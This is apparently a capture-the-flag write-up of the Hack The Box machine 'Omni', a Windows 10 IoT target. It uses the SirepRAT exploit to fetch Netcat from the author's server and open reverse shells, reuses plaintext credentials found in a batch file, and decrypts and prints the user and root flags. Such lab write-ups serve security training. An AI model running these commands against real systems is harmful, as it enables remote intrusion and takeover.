The box Omni had a very unusual Operating System for HTB machines. It was a Windows 10 IoT machine, which was new for me. The foothold consisted of an exploit for this Operating System. For user and root, I used the same technique and grabbed reverse shells.
[0x1] Reconnaissance & Enumeration
The start of this journey includes the well known Nmap scan. There are a few ports open, including an RPC, Win-RM, web, and some higher ports. Port 8080 is detected as an IIS webserver port and hosts a website called “Windows Device Portal”. A quick search explains that this is the Windows 10 IoT Operating System.
nmap -sC -sV -p- -oA omni 10.10.10.204 Nmap scan report for 10.10.10.204 Host is up (0.039s latency). Not shown: 65529 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 5985/tcp open upnp Microsoft IIS httpd 8080/tcp open upnp Microsoft IIS httpd | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=Windows Device Portal |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn't have a title. 29817/tcp open unknown 29819/tcp open arcserve ARCserve Discovery 29820/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port29820-TCP:V=7.80%I=7%D=11/2%Time=5FA05F74%P=x86_64-pc-linux-gnu%r(N SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10," SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0 SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x SF:c9}\xc8O\x12"); Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Visiting the website on port 8080 only gives a Basic login prompt which you have to use to authenticate before you can access the Device Portal.
[0x2] Initial Foothold
While searching for Windows IoT vulnerabilities, I stumbled upon a GitHub page called “SirepRAT – RCE as SYSTEM on Microsoft IoT Core”. This described a vulnerability in Windows IoT Core’s Sirep Service. This service is installed with the Operating System by default and included to help test drivers and hardware.
The exploit described a way you could execute commands as SYSTEM remotely. The first thing that came to my mind is to use it to launch a reverse shell and get access to the machine. Let’s fire up a Python webserver to serve Netcat for Windows on port 8000.
python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ...
To get that Netcat for Windows to the other side, I used the SirepRAT exploit and placed it in a directory I know I can write to on a Windows machine. This worked like a charm and Netcat is now ready for launch.
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "powershell" --args " /c Invoke-WebRequest -Uri "http://10.10.14.64:8000/nc64.exe" -OutFile "c:\\windows\\system32\\spool\\drivers\\color\\nc64.exe"" --v
Before I can run Netcat, I have to make sure Netcat on the receiving part is ready for an incoming connection.
rlwrap netcat -lvnp 1337 listening on [any] 1337 ...
With the executable in place, and my Netcat listener running, it is time to run Netcat remotely and call home to my machine on port 1337 with a command prompt.
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "cmd.exe" --args " /c c:\\windows\\system32\\spool\\drivers\\color\\nc64.exe 10.10.14.64 1337 -e cmd" --v
Just as I expected, that worked like a charm. It is always a surprise if the tools you use on a Microsoft Windows machine are not blocked by things like Defender because that is still included in Windows 10 IoT. Nevertheless, we’ve got a shell. I had to search how you can find out as to which user you are logged on since whoami did not work on this box. Courtesy of Windows 10 IoT.
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49682 Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved. PS C:\> $env:username $env:username DefaultAccount
[0x3] Path to User flag
The box seemed pretty standard, with no interesting software or services. One thing I also do on Windows boxes is run a search for specific filetypes. Textfiles, batch files, and Powershell scripts. Many Windows boxes hide their gems like that. Also, a quick check to see if there are any other usernames that look interesting, and one for the flag (which was not there).
PS C:\data\users> dir -force dir -force Directory: C:\data\users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 7/4/2020 9:48 PM administrator d----- 7/4/2020 9:53 PM app d-rh-- 7/4/2020 12:22 AM Default d----- 7/3/2020 11:22 PM DefaultAccount d----- 7/3/2020 11:22 PM DevToolsUser d-r--- 8/21/2020 1:55 PM Public d----- 7/4/2020 10:29 PM System
So for the search, I use a quick and dirty Powershell command. It does the trick.
PS C:\> Get-ChildItem c:\*.txt -force -Recurse PS C:\> Get-ChildItem c:\*.xml -force -Recurse PS C:\> Get-ChildItem c:\*.bat -force -Recurse
There were a few files that were returned by the search. Batch-file to be precise. Since r.bat does not sound like a default Windows file it decided to take a further look.
Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-h-- 8/21/2020 12:56 PM 247 r.bat Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/26/2018 11:36 PM 925 Pester.bat Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/26/2018 11:36 PM 744 Build.bat
The script showed two sets of credentials, one for the user ‘app’ and one for the user ‘administrator’. That sounds promising.
type r.bat @echo off :LOOP for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete net user app mesh5143 net user administrator _1nt3rn37ofTh1nGz ping -n 3 127.0.0.1 cls GOTO :LOOP :EXIT
With the user credentials for ‘app’ I decided to try and logon to the Windows Device Portal to see if that can help me get to the next step on this box.
After authenticating as ‘app’ I find a nice option to run commands. Which the Netcat for Windows executable is still present, I try to run that in the context of the logged-on user ‘app’. Before the launch a start a new listener on my machine to catch the incoming connection.
rlwrap netcat -lvnp 1338 listening on [any] 1338 ...
The reverse shell worked and now I have a new connection as the user app.
listening on [any] 1338 ... connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49684 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\windows\system32> PS C:\windows\system32> $env:username $env:username app
With the new shell active, I go on to look for the user flag. There are two files in the home directory of this user which are interesting. The user.txt and hardening.txt.
PS C:\data\users\app> dir dir Directory: C:\data\users\app Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 7/4/2020 7:28 PM 3D Objects d-r--- 7/4/2020 7:28 PM Documents d-r--- 7/4/2020 7:28 PM Downloads d----- 7/4/2020 7:28 PM Favorites d-r--- 7/4/2020 7:28 PM Music d-r--- 7/4/2020 7:28 PM Pictures d-r--- 7/4/2020 7:28 PM Videos -ar--- 7/4/2020 8:20 PM 344 hardening.txt -ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml -ar--- 7/4/2020 9:53 PM 1958 user.txt
The content of the hardening file is not that interesting, but it does hint at the fact that the administrator password I found could be the actual one.
type hardening.txt - changed default administrator password of "p@ssw0rd" - added firewall rules to restrict unnecessary services - removed administrator account from "Ssh Users" group
The content of the user.txt is a whole different story. Normally you would find the code to submit to the Hack The Box website, but this time the flag seems to be encrypted. Based on the structure it is encrypted with Powershell.
type user.txt <Objs Version="18.104.22.168" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">flag</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS> </Props> </Obj> </Objs>
If you are familiar with the way Powershell can encrypt strings it is easy to decode the flag. The User flag is now in possession.
$credential = Import-CliXml -Path user.txt $credential.GetNetworkCredential().Password 7cfd50f6bc34db3204898f1505ad9d70
[0x4] Path to Root flag
Since we already have credentials for root, I try if the same technique can be used to get a root shell. So again I start a listener, log in to the website with the Administrator credentials from the batch file, and execute Netcat to connect to my listener. And it looks like a charm. Now I have myself a nice reverse shell as ‘Administrator’.
listening on [any] 1339 ... connect to [10.10.14.64] from (UNKNOWN) [10.10.10.204] 49685 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\windows\system32> $env:username $env:username Administrator
It looks like the root flag is also present here and we can simply grab it and call it a day.
PS C:\data\users\administrator> dir Directory: C:\data\users\administrator Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 7/3/2020 11:23 PM 3D Objects d-r--- 7/3/2020 11:23 PM Documents d-r--- 7/3/2020 11:23 PM Downloads d----- 7/3/2020 11:23 PM Favorites d-r--- 7/3/2020 11:23 PM Music d-r--- 7/3/2020 11:23 PM Pictures d-r--- 7/3/2020 11:23 PM Videos -ar--- 7/4/2020 9:48 PM 1958 root.txt
How about that, it is also encrypted using the same method as the user flag.
PS C:\data\users\administrator> type root.txt <Objs Version="22.214.171.124" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">flag</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS> </Props> </Obj> </Objs>
We can decrypt the root flag and get the root flag to submit for this box. I can officially call Omni rooted.
$credential = Import-CliXml -Path root.txt $credential.GetNetworkCredential().Password 5dbdce5569e2c4708617c0ce6e9bf11d